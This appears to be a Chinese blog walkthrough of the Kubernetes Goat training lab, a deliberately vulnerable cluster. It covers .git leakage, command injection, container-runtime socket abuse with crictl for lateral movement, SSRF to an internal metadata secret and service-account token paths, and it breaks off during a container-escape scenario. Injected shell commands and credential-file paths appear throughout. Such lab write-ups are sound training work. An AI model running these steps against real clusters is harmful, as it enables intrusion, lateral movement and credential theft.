<!DOCTYPE html>
<html lang="en" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="Keep your passion for what you love !" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      k8s goat靶场练习 
      
      
      |
    
     Keep your passion for what you love !
  </title>

  
    <link rel="apple-touch-icon" href="/images/favicon.png">
    <link rel="icon" href="/images/favicon.png">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  
    
<link rel="stylesheet" href="/css/figcaption/mac-block.css">

  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 8.1.1"><link rel="alternate" href="/atom.xml" title="Keep your passion for what you love !" type="application/atom+xml">
</head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/avatar.png" alt="">
      
    </a>
    <div class="nickname"><a href="/"></a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">Tags</a>
        </li>
      
        <li class="nav-item" data-path="/categories/">
          <a href="/categories/">Category</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">About</a>
        </li>
      
        <li class="nav-item" data-path="/collections/">
          <a href="/collections/">Collections</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="https://cdn.jsdelivr.net/npm/clipboard@2.0.10/dist/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  


  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">k8s goat靶场练习</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="Update time"></i>
          2026-03-12 10:16:46
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags mr-10" title="Tags"></i>
                
                <span class="span--tag mr-8">
                  <a href="/tags/Kubernetes/" title="Kubernetes">
                    #Kubernetes
                  </a>
                </span>
                
                <span class="span--tag mr-8">
                  <a href="/tags/%E5%AE%B9%E5%99%A8%E9%80%83%E9%80%B8/" title="容器逃逸">
                    #容器逃逸
                  </a>
                </span>
                
                <span class="span--tag mr-8">
                  <a href="/tags/%E4%BA%91%E5%AE%89%E5%85%A8/" title="云安全">
                    #云安全
                  </a>
                </span>
                
              </span>
          
              <span class="post-categories">
                <i class="iconfont icon-bookmark" title="Categories"></i>
                
                <span class="span--category">
                  <a href="/categories/Web%E5%AE%89%E5%85%A8/" title="Web安全">
                    <b>#</b> Web安全
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h2 id="前言">前言</h2>
<p>Kubernetes Goat<sup class="footnote-ref"><a href="#fn1" id="fnref1">[1]</a></sup>被设计成一个故意易受攻击的集群环境，用于学习和实践Kubernetes安全性。搭建的过程，这里就忽略了。</p>
<h2 id="一、Sensitive-keys-in-codebases">一、Sensitive keys in codebases</h2>
<p>代码库中的敏感密钥。</p>
<p>场景描述：</p>
<blockquote>
<p>Developers tend to commit sensitive information to version control systems. As we are moving towards CI/CD and GitOps systems, we tend to forgot identifying sensitive information in code and commits. Let’s see if we can find something cool here!</p>
</blockquote>
<p>靶场地址：<a target="_blank" rel="noopener" href="http://127.0.0.1:1230">http://127.0.0.1:1230</a></p>
<h3 id="git信息泄露">.git信息泄露</h3>
<p>首先，信息泄露，先进行目录扫描。</p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311161400754.png" alt="image-20260311161400754"></p>
<p>下载.git的文件。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git-dumper http://localhost:1230/.git k8s-goat-git</span><br></pre></td></tr></table></figure>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311161538916.png" alt="image-20260311161538916"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">cd</span> k8s-goat-git</span><br><span class="line">git <span class="built_in">log</span></span><br></pre></td></tr></table></figure>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311162734226.png" alt="image-20260311162734226"></p>
<p>当切换到<code>d7c173ad183c574109cd5c4c648ffe551755b576</code>的时候，发现了key的邪路。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git checkout d7c173ad183c574109cd5c4c648ffe551755b576</span><br></pre></td></tr></table></figure>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311163149741.png" alt="image-20260311163149741"></p>
<h2 id="二、DIND-docker-in-docker-exploitation">二、DIND (docker-in-docker) exploitation</h2>
<p>场景介绍：</p>
<blockquote>
<p>Most of the CI/CD and pipeline system which use Docker and build containers for you with in the pipeline use something called DIND (docker-in-docker). Here in this scenario, we try to exploit and gain access to host system.</p>
</blockquote>
<p>大多数 CI/CD 和流水线系统都使用底层主机容器运行时，通过一种名为 DIND（Docker-in-Docker）的技术，利用 UNIX 套接字在流水线内部构建容器。在本场景中，我们尝试利用这种配置错误，通过逃逸出 Docker 容器来获取对工作节点主机系统的访问权限。</p>
<p>靶场地址：<a target="_blank" rel="noopener" href="http://127.0.0.1:1231/">http://127.0.0.1:1231/</a></p>
<h3 id="命令注入">命令注入</h3>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311164337527.png" alt="image-20260311164337527"></p>
<p>发现是命令注入漏洞。</p>
<h3 id="容器逃逸，横向移动">容器逃逸，横向移动</h3>
<p><code>mount</code>查看挂载的文件。</p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311164430181.png" alt="image-20260311164430181"></p>
<p>整理了一下文件的格式：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">rtt min/avg/max/mdev = 0.099/0.143/0.187/0.044 ms</span><br><span class="line"></span><br><span class="line">overlay on / <span class="built_in">type</span> overlay (rw,relatime,lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/74/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/73/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/72/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/71/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/70/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/69/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/68/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/67/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/66/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/65/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/64/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/63/fs:/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/62/fs,upperdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/75/fs,workdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/75/work,uuid=on)</span><br><span class="line">proc on /proc <span class="built_in">type</span> proc (rw,nosuid,nodev,noexec,relatime)</span><br><span class="line">tmpfs on /dev <span class="built_in">type</span> tmpfs (rw,nosuid,size=65536k,mode=755)</span><br><span class="line">devpts on /dev/pts <span class="built_in">type</span> devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)</span><br><span class="line">mqueue on /dev/mqueue <span class="built_in">type</span> mqueue (rw,nosuid,nodev,noexec,relatime)</span><br><span class="line">sysfs on /sys <span class="built_in">type</span> sysfs (rw,nosuid,nodev,noexec,relatime)</span><br><span class="line">cgroup on /sys/fs/cgroup <span class="built_in">type</span> cgroup2 (rw,nosuid,nodev,noexec,relatime)</span><br><span class="line">/dev/vda1 on /etc/hosts <span class="built_in">type</span> ext4 (rw,relatime,discard)</span><br><span class="line">/dev/vda1 on /dev/termination-log <span class="built_in">type</span> ext4 (rw,relatime,discard)</span><br><span class="line">/dev/vda1 on /etc/hostname <span class="built_in">type</span> ext4 (rw,relatime,discard)</span><br><span class="line">/dev/vda1 on /etc/resolv.conf <span class="built_in">type</span> ext4 (rw,relatime,discard)</span><br><span class="line">shm on /dev/shm <span class="built_in">type</span> tmpfs (rw,relatime,size=65536k)</span><br><span class="line">tmpfs on /custom/containerd/containerd.sock <span class="built_in">type</span> tmpfs (rw,relatime,mode=755) <span class="comment"># 问题点</span></span><br><span class="line">tmpfs on /run/secrets/kubernetes.io/serviceaccount <span class="built_in">type</span> tmpfs (ro,relatime,size=102400k,noswap)</span><br></pre></td></tr></table></figure>
<p><strong><code>mount</code> 命令是用来查看、挂载和管理文件系统的</strong>。</p>
<p>在 Linux 里，一切文件最终都要“挂”到某个目录上才能访问。比如硬盘分区、内存文件系统、容器里的特殊伪文件系统，都会通过 <code>mount</code> 挂到 <code>/</code>、<code>/proc</code>、<code>/dev</code> 这种路径下。<br>
所以 <code>mount</code> 常见有两种用途：</p>
<ul>
<li>不带参数时：查看当前系统已经挂载了哪些文件系统</li>
<li>带参数时：把某个设备或文件系统挂到某个目录上</li>
</ul>
<p>你这里看到的内容，本质上就是 <code>mount</code> 的输出结果，表示“当前容器/系统里有哪些挂载点”。</p>
<p>我们发现在挂载的路径中倒数第二行出现了<code>tmpfs on /custom/containerd/containerd.sock type tmpfs (rw,relatime,mode=755)</code>。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tmpfs on /custom/containerd/containerd.sock <span class="built_in">type</span> tmpfs (rw,relatime,mode=755)</span><br></pre></td></tr></table></figure>
<p><code>tmpfs</code> 表示这个挂载对象底层来自 <code>tmpfs</code> 文件系统。</p>
<p><code>on /custom/containerd/containerd.sock</code> 表示在容器内，这个对象挂载到了这个路径。</p>
<p><code>type tmpfs</code> 表示文件系统类型是 <code>tmpfs</code>。</p>
<p><code>(rw,relatime,mode=755)</code> 表示挂载参数：</p>
<ul>
<li><code>rw</code>：可读写</li>
<li><code>relatime</code>：访问时间按折中策略更新</li>
<li><code>mode=755</code>：权限模式是 <code>755</code></li>
</ul>
<p>一句话解释：</p>
<p><strong>容器里有一个挂载点 <code>/custom/containerd/containerd.sock</code>，它对应的是宿主机运行时环境里的一个 <code>containerd</code> socket，这个 socket 所在底层文件系统是 <code>tmpfs</code>。</strong></p>
<p>我们假设<code>/custom/containerd/containerd.sock</code>，它是从宿主机挂载的，我们需要与它通信才能通过 UNIX 套接字与宿主机进行通信。</p>
<p>我们可以使用多种方法与 <code>containerd.sock</code> UNIX 套接字通信。其中一些方法包括使用<code>crictl</code> 二进制文件<sup class="footnote-ref"><a href="#fn2" id="fnref2">[2]</a></sup>，或者使用简单的 <code>curl</code> 程序。</p>
<p>我准备使用<code>crictl</code>，<code>;uname -a</code>查看架构为<code>aarch64 GNU/Linux</code>。</p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311174121909.png" alt="image-20260311174121909"></p>
<p>下载对应架构的<code>crictl</code>二进制文件。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;wget https://github.com/kubernetes-sigs/cri-tools/releases/download/v1.35.0/crictl-v1.35.0-linux-arm64.tar.gz -O /tmp/crictl-v1.35.0-linux-arm64.tar.gz</span><br></pre></td></tr></table></figure>
<p>下载好后，解压文件。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;tar -xvf /tmp/crictl-v1.35.0-linux-arm64.tar.gz -C /tmp/</span><br></pre></td></tr></table></figure>
<p>然后执行命令：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;/tmp/crictl -r unix:///custom/containerd/containerd.sock images</span><br></pre></td></tr></table></figure>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311184523430.png" alt="image-20260311184523430">成功了！。</p>
<p>结果为：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line">IMAGE                                              TAG                                   IMAGE ID        SIZE</span><br><span class="line">docker.io/kindest/kindnetd                         v20251212-v0.29.0-alpha-105-g20ccfc88 c96ee3c174987  38.5MB</span><br><span class="line">docker.io/kindest/local-path-helper                v20251211-v0.29.0-alpha-100-g82a92c5d 0448c5de7d88e  2.95MB</span><br><span class="line">docker.io/kindest/local-path-provisioner           v20251212-v0.29.0-alpha-105-g20ccfc88 909b40d32940f  22MB</span><br><span class="line">docker.io/madhuakula/k8s-goat-batch-check          latest                                f0129d6152f41  90.8MB</span><br><span class="line">docker.io/madhuakula/k8s-goat-build-code           latest                                295ed6ef17f8f  88.9MB</span><br><span class="line">docker.io/madhuakula/k8s-goat-cache-store          latest                                dd7acaadfcf7d  11.3MB</span><br><span class="line">docker.io/madhuakula/k8s-goat-health-check         latest                                e5234b72530ac  429MB</span><br><span class="line">docker.io/madhuakula/k8s-goat-hidden-in-layers     latest                                d4a7f5772aced  3.34MB</span><br><span class="line">docker.io/madhuakula/k8s-goat-home                 latest                                5bf9d602729ff  6.65MB</span><br><span class="line">docker.io/madhuakula/k8s-goat-hunger-check         latest                                39cb96832fddc  73.8MB</span><br><span class="line">docker.io/madhuakula/k8s-goat-info-app             latest                                5e137868144e2  26.9MB</span><br><span class="line">docker.io/madhuakula/k8s-goat-internal-api         latest                                ac910afcbecee  58.2MB</span><br><span class="line">docker.io/madhuakula/k8s-goat-metadata-db          latest                                e4b146126a33c  117MB</span><br><span class="line">docker.io/madhuakula/k8s-goat-poor-registry        latest                                43b0769ea2400  62.8MB</span><br><span class="line">docker.io/madhuakula/k8s-goat-system-monitor       latest                                85e024be14a08  70.1MB</span><br><span class="line">registry.k8s.io/coredns/coredns                    v1.13.1                               e08f4d9d2e6ed  21.2MB</span><br><span class="line">registry.k8s.io/etcd                               3.6.6-0                               271e49a0ebc56  21.7MB</span><br><span class="line">registry.k8s.io/kube-apiserver-arm64               v1.35.0                               c3fcf259c473a  85MB</span><br><span class="line">registry.k8s.io/kube-apiserver                     v1.35.0                               c3fcf259c473a  85MB</span><br><span class="line">registry.k8s.io/kube-controller-manager-arm64      v1.35.0                               88898f1d1a62a  72.2MB</span><br><span class="line">registry.k8s.io/kube-controller-manager            v1.35.0                               88898f1d1a62a  72.2MB</span><br><span class="line">registry.k8s.io/kube-proxy-arm64                   v1.35.0                               de369f46c2ff5  74.1MB</span><br><span class="line">registry.k8s.io/kube-proxy                         v1.35.0                               de369f46c2ff5  74.1MB</span><br><span class="line">registry.k8s.io/kube-scheduler-arm64               v1.35.0                               ddc8422d4d35a  49.8MB</span><br><span class="line">registry.k8s.io/kube-scheduler                     v1.35.0                               ddc8422d4d35a  49.8MB</span><br><span class="line">registry.k8s.io/pause                              3.10                                  afb61768ce381  268kB</span><br></pre></td></tr></table></figure>
<p>继续深入，可以列出全部的容器：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">;/tmp/crictl -r unix:///custom/containerd/containerd.sock ps -a</span><br></pre></td></tr></table></figure>
<p>可以得到</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">CONTAINER ID   IMAGE ID        CREATED      STATE    NAME                  ATTEMPT   POD ID         POD NAME                                               POD NAMESPACE</span><br><span class="line">39b55a6ac9d3e  5e137868144e2   3 days ago   Running  info-app              0         e6e53b836f1e2  internal-proxy-deployment-c59c45d94-sqnpw              default</span><br><span class="line">7fd500055a6ea  5bf9d602729ff   3 days ago   Running  kubernetes-goat-home  0         a6035d3fd74af  kubernetes-goat-home-deployment-cd46cd955-xsz9c        default</span><br><span class="line">c1164292dc4c2  85e024be14a08   3 days ago   Running  system-monitor        0         31eb34dc67c5d  system-monitor-deployment-866f697c75-2wzd4             default</span><br><span class="line">f0465014d9a14  43b0769ea2400   3 days ago   Running  poor-registry         0         7eb8803f3ca43  poor-registry-deployment-7b75fbd7-qlvsg                default</span><br><span class="line">11cb3c401ce8a  d4a7f5772aced   3 days ago   Running  hidden-in-layers      0         7eb4629b76999  hidden-in-layers-rh6pp                                 default</span><br><span class="line">4bb9f88a07c43  295ed6ef17f8f   3 days ago   Running  build-code            0         503a7c0c931a6  build-code-deployment-84fb858df9-qsx8s                 default</span><br><span class="line">33ac4a15dfc6b  e5234b72530ac   3 days ago   Running  health-check          0         d7b28bb9045dc  health-check-deployment-b7f74cdc8-mvt5t                default</span><br><span class="line">a7d6f32eff992  ac910afcbecee   3 days ago   Running  internal-api          0         e6e53b836f1e2  internal-proxy-deployment-c59c45d94-sqnpw              default</span><br><span class="line">7e32a60ced9ac  e4b146126a33c   3 days ago   Running  metadata-db           0         03673c0418556  metadata-db-6fbb8cd6d7-c5qfk                           default</span><br><span class="line">ebbfc8dd10ac6  39cb96832fddc   3 days ago   Running  hunger-check          0         15b769666d6ac  hunger-check-deployment-5488f8b86c-6tkmh               big-monolith</span><br><span class="line">6a4dc552eabaa  dd7acaadfcf7d   3 days ago   Running  cache-store           0         b6819e7a6b4aa  cache-store-deployment-8bf8d695b-9smb8                 secure-middleware</span><br><span class="line">356d2c4b53ee9  f0129d6152f41   3 days ago   Running  batch-check           0         db767a53e1087  batch-check-job-5hbfj                                  default</span><br><span class="line">c55f45aa910bb  c96ee3c174987   3 days ago   Running  kindnet-cni           0         f23313cef012f  kindnet-tw6sq                                          kube-system</span><br><span class="line">860f3299cb335  de369f46c2ff5   3 days ago   Running  kube-proxy            0         1a148ce1d7c37  kube-proxy-462gh                                       kube-system</span><br></pre></td></tr></table></figure>
<p>进入到其它的容器中：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># /tmp/crictl -r unix:///custom/containerd/containerd.sock exec -s &lt;container_id&gt; id</span></span><br><span class="line">;/tmp/crictl -r unix:///custom/containerd/containerd.sock <span class="built_in">exec</span> -s 7fd500055a6ea <span class="built_in">id</span></span><br></pre></td></tr></table></figure>
<p>必须要带<code>-s</code>参数才能执行成功<sup class="footnote-ref"><a href="#fn3" id="fnref3">[3]</a></sup>。</p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311212736579.png" alt="image-20260311212736579"></p>
<p>这个<code>-s</code>非常重要，否则，crictl 将会尝试通过 HTTP 端点来运行该命令，导致执行失败。这样就可以实现了pod间的横向移动。</p>
<p><strong>漏洞根本原因：</strong></p>
<p>Pod的<code>hostPath</code>挂载点（宿主机源路径）为以下内容，就会出现这样的安全问题：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">/var/run/dockershim.sock</span><br><span class="line">/run/containerd/containerd.sock</span><br><span class="line">/run/crio/crio.sock</span><br><span class="line">/var/run/cri-dockerd.sock</span><br></pre></td></tr></table></figure>
<p><strong>漏洞的修复策略：</strong></p>
<p>使用 Pod 安全策略或准入控制器来阻止或限制创建 <code>hostPath</code> 挂载点位于以下位置的 Pod：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">/var/run/dockershim.sock</span><br><span class="line">/run/containerd/containerd.sock</span><br><span class="line">/run/crio/crio.sock</span><br><span class="line">/var/run/cri-dockerd.sock</span><br></pre></td></tr></table></figure>
<h2 id="三、SSRF-in-the-Kubernetes-K8S-world">三、SSRF in the Kubernetes (K8S) world</h2>
<p>场景介绍：</p>
<blockquote>
<p>SSRF (Server Side Request Forgery) vulnerability became the go-to attack for cloud native environments. Here in this scenario, we will see how we can exploit an application vulnerability like SSRF to gain access to cloud instance metadata as well as internal services metdata information.</p>
</blockquote>
<p>靶场地址：<a target="_blank" rel="noopener" href="http://127.0.0.1:1232">http://127.0.0.1:1232</a></p>
<h3 id="内网探测">内网探测</h3>
<p>访问内网地址：<a target="_blank" rel="noopener" href="http://127.0.0.1:5000">http://127.0.0.1:5000</a></p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311221049632.png" alt="image-20260311221049632"></p>
<p>从上图中，我发现了<a target="_blank" rel="noopener" href="http://xn--metadata-db-9n1tqg">http://metadata-db地址</a>。</p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311221343456.png" alt="image-20260311221343456"></p>
<p>遍历路径，找到了<a target="_blank" rel="noopener" href="http://metadata-db/latest/secrets/kubernetes-goat">http://metadata-db/latest/secrets/kubernetes-goat</a></p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311221539434.png" alt="image-20260311221539434"></p>
<p>解码这个data，可以得到：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">&quot;azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI=&quot;</span> | <span class="built_in">base64</span> -d</span><br></pre></td></tr></table></figure>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311221644940.png" alt="image-20260311221644940"></p>
<h3 id="ServiceAccount-token">ServiceAccount token</h3>
<p>k8s中pod的ServiceAccount token地址一般为：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/var/run/secrets/kubernetes.io/serviceaccount/token</span><br></pre></td></tr></table></figure>
<p>同目录下通常还有这几个文件：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">/var/run/secrets/kubernetes.io/serviceaccount/ca.crt</span><br><span class="line">/var/run/secrets/kubernetes.io/serviceaccount/namespace</span><br></pre></td></tr></table></figure>
<p>分别表示：</p>
<ul>
<li><code>token</code>：访问 Kubernetes API 用的 Bearer Token</li>
<li><code>ca.crt</code>：API Server 的 CA 证书</li>
<li><code>namespace</code>：当前 Pod 所在命名空间</li>
</ul>
<p>所以很多容器里访问集群 API 时，会配合下面这个地址一起用：</p>
<ul>
<li>API 地址：<code>https://kubernetes.default.svc</code></li>
<li>Token 文件：<code>/var/run/secrets/kubernetes.io/serviceaccount/token</code></li>
</ul>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260311215140454.png" alt="image-20260311215140454"></p>
<p>不过要注意两点：</p>
<p>1、不是所有 Pod 都一定有token</p>
<p>如果显式关闭了自动挂载，比如：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">automountServiceAccountToken<span class="punctuation">:</span> <span class="literal"><span class="keyword">false</span></span></span><br></pre></td></tr></table></figure>
<p>那这个目录可能不存在。</p>
<p>2、新版本里底层机制可能是投射卷<br>
虽然实现方式变了，但容器内默认看到的路径通常还是这条。</p>
<h3 id="拓展">拓展</h3>
<p>再多了解一些内容。</p>
<p><strong>这个 token 是怎么自动挂进 Pod 的？</strong></p>
<p>核心流程是：</p>
<ol>
<li>Pod 被创建</li>
<li>Pod 会绑定一个 <code>ServiceAccount</code></li>
<li>如果没有特别指定，默认用当前命名空间里的 <code>default</code> <code>ServiceAccount</code></li>
<li>Kubernetes 检查这个 Pod 是否允许自动挂载 ServiceAccount token</li>
<li>如果允许，就把一个 ServiceAccount token 投射卷 挂进容器</li>
<li>容器里就能在固定路径看到 <code>token</code>、<code>ca.crt</code>、<code>namespace</code></li>
</ol>
<p>你在 Pod 里常看到的目录就是：<code>/var/run/secrets/kubernetes.io/serviceaccount/</code></p>
<p>里面一般有：<code>token</code>、<code>ca.crt</code>和<code>namespace</code>。</p>
<p><strong>这个token是干嘛的？它和 <code>ServiceAccount</code>、<code>RBAC</code>、<code>kubernetes.default.svc</code> 是什么关系？</strong></p>
<p>这四者可以这样理解：</p>
<ul>
<li><code>ServiceAccount</code>：Pod 的“身份”</li>
<li><code>token</code>：证明这个身份的“凭证”</li>
<li><code>kubernetes.default.svc</code>：集群内访问 API Server 的“地址”</li>
<li><code>RBAC</code>：这个身份“能做什么”的权限规则</li>
</ul>
<p>它们连起来就是：</p>
<p>Pod 带着某个 ServiceAccount 的 token，请求 <code>kubernetes.default.svc</code> 这个 API Server 地址，API Server 再根据 RBAC 判断它有没有权限执行该操作。</p>
<h2 id="四、Container-escape-to-the-host-system">四、Container escape to the host system</h2>
<p>特权配置，容器逃逸到宿主机系统。</p>
<p>场景介绍：</p>
<blockquote>
<p>Most of the monitoring, tracing and debugging software require to run with extra privileges and capabilities. Here in this scenario, we will see a pod with extra capabilities and privileges including HostPath allows us to gain access to host system and provide Node level configuration to gain complete cluster compromise.</p>
</blockquote>
<p>此场景的目标是利用宿主机系统上存在的配置错误，逃离正在运行的 Docker 容器。次要目标是利用宿主机系统级的访问权限，获取其他资源，如果可能的话，甚至获取容器、节点和集群级别的访问权限。</p>
<p>靶场地址：<a target="_blank" rel="noopener" href="http://127.0.0.1:1233/">http://127.0.0.1:1233/</a></p>
<p><img src="/2026/03/11/k8s-goat%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/image-20260312002722416.png" alt="image-20260312002722416"></p>
<h3 id="查看容器的配置信息">查看容器的配置信息</h3>
<p>获取主机系统的访问权限，并获取节点级 kubeconfig 文件 <code>/var/lib/kubelet/kubeconfig</code> ，然后使用获取的配置查询 Kubernetes 节点。</p>
<h4 id="capsh-print">capsh --print</h4>
<p>执行命令<code>capsh --print</code>，结果如下：</p>
